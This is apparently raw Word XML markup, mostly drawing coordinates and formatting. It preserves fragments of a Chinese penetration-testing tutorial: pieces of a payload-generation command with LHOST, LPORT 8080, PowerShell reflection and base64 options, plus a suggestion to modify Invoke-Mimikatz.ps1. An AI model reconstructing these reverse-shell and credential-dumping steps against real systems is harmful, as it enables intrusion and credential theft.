,9839,2800,9839,2594,9839,2385,9839,2172,9839,1955,9839,1734,9839,1510,9839,1510,9839,1510,9839,1510,9839,1510,9839,1510,9839,1510,9839,1510,9839,1510,9839,1510,9839,1510,9839,1510,9838,1510,9838,1510,9838,1510,9838,1510,9837,1510,9837,1510,9837,1510,9836,1510,9836,1510,9835,1510,9834,1510,9834,1510,9833,1510,9832,1510,9831,1510,9830,1510,9829,1510,9828,1510,9827,1510,9825,1510,9824,1510,9822,1510,9821,1510,9819,1510,9817,1510,9815,1510,9813,1510,9811,1510,9808,1510,9806,1510,9803,1510,9800,1510,9797,1510,9794,1510,9791,1510,9788,1510,9784,1510,9781,1510,9777,1510,9773,1510,9769,1510,9765,1510,9760,1510,9755,1510,9751,1510,9746,1510,9740,1510,9735,1510,9729,1510,9724,1510,9718,1510,9712,1510,9705,1510,9699,1510,9692,1510,9685,1510,9678,1510,9670,1510,9663,1510,9655,1510,9647,1510,9638,1510,9630,1510,9621,1510,9612,1510,9602,1510,9593,1510,9583,1510,9573,1510,9562,1510,9552,1510,9541,1510,9530,1510,9518,1510,9506,1510,9494,1510,9482,1510,9469,1510,9457,1510,9443,1510,9430,1510,9416,1510,9402,1510,9388,1510,9373,1510,9358,1510,9343,1510,9327,1510,9311,1510,9295,1510,9278,1510,9261,1510,9244,1510,9226,1510,9208,1510,9189,1510,9171,1510,9152,1510,9132,1510,9112,1510,9092,1510,9072,1510,9051,1510,9029,1510,9008,1510,8986,1510,8963,1510,8940,1510,8917,1510,8893e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:444.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8890" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:8890;width:8990;height:10" coordorigin="1490,8890" coordsize="8990,10" path="m1510,8901l1510,8901,1510,8901,1510,8901,1510,8901,1510,8901,1510,8901,1511,8901,1512,8901,1512,8901,1514,8901,1515,8901,1517,8901,1519,8901,1521,8901,1524,8901,1528,8901,1532,8901,1536,8901,1541,8901,1546,8901,1552,8901,1559,8901,1566,8901,1575,8901,1583,8901,1593,8901,1603,8901,1615,8901,1627,8901,1640,8901,1654,8901,1668,8901,1684,8901,1701,8901,1719,8901,1738,8901,1758,8901,1780,8901,1802,8901,1826,8901,1851,8901,1877,8901,1904,8901,1933,8901,1963,8901,1995,8901,2028,8901,2063,8901,2099,8901,2136,8901,2175,8901,2216,8901,2259,8901,2303,8901,2348,8901,2396,8901,2445,8901,2496,8901,2549,8901,2604,8901,2660,8901,2719,8901,2779,8901,2841,8901,2906,8901,2972,8901,3041,8901,3112,8901,3184,8901,3259,8901,3336,8901,3416,8901,3498,8901,3582,8901,3668,8901,3757,8901,3848,8901,3941,8901,4037,8901,4136,8901,4236,8901,4340,8901,4446,8901,4555,8901,4666,8901,4780,8901,4897,8901,5017,8901,5139,8901,5264,8901,5392,8901,5523,8901,5657,8901,5793,8901,5933,8901,6076,8901,6222,8901,6370,8901,6522,8901,6677,8901,6835,8901,6997,8901,7161,8901,7329,8901,7500,8901,7675,8901,7853,8901,8034,8901,8219,8901,8407,8901,8598,8901,8793,8901,8992,8901,9194,8901,9400,8901,9609,8901,9823,8901,10039,8901,10260,8901,10484,8901e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:490.500pt;width:449.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9810" coordsize="8990,30">
        <v:shape style="position:absolute;left:1490;top:9810;width:8990;height:30" coordorigin="1490,9810" coordsize="8990,30" path="m1510,9831l1510,9831,1510,9831,1510,9831,1510,9831,1510,9831,1510,9831,1511,9831,1512,9831,1512,9831,1514,9831,1515,9831,1517,9831,1519,9831,1521,9831,1524,9831,1528,9831,1532,9831,1536,9831,1541,9831,1546,9831,1552,9831,1559,9831,1566,9831,1575,9831,1583,9831,1593,9831,1603,9831,1615,9831,1627,9831,1640,9831,1654,9831,1668,9831,1684,9831,1701,9831,1719,9831,1738,9831,1758,9831,1780,9831,1802,9831,1826,9831,1851,9831,1877,9831,1904,9831,1933,9831,1963,9831,1995,9831,2028,9831,2063,9831,2099,9831,2136,9831,2175,9831,2216,9831,2259,9831,2303,9831,2348,9831,2396,9831,2445,9831,2496,9831,2549,9831,2604,9831,2660,9831,2719,9831,2779,9831,2841,9831,2906,9831,2972,9831,3041,9831,3112,9831,3184,9831,3259,9831,3336,9831,3416,9831,3498,9831,3582,9831,3668,9831,3757,9831,3848,9831,3941,9831,4037,9831,4136,9831,4236,9831,4340,9831,4446,9831,4555,9831,4666,9831,4780,9831,4897,9831,5017,9831,5139,9831,5264,9831,5392,9831,5523,9831,5657,9831,5793,9831,5933,9831,6076,9831,6222,9831,6370,9831,6522,9831,6677,9831,6835,9831,6997,9831,7161,9831,7329,9831,7500,9831,7675,9831,7853,9831,8034,9831,8219,9831,8407,9831,8598,9831,8793,9831,8992,9831,9194,9831,9400,9831,9609,9831,9823,9831,10039,9831,10260,9831,10484,9831e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:443.400pt;width:445.800pt;height:48.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:105.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:214.800pt;width:467.400pt;height:189.60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例2（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目标不出网，本地执行）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注：加p</w:t>
      </w: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ayload参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="15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x64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LHOST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LP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ORT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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8080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psh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reflection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‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>arch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‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>platform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wershell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base64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arch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x64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platform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payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="30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更</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>多有趣的实验：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把例1的down内容更改为例2，并且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去掉payload参数。来减小payload大小。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更改Invoke-Mimika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tz.ps1等。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424.200pt;width:7.200pt;height:7.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:327.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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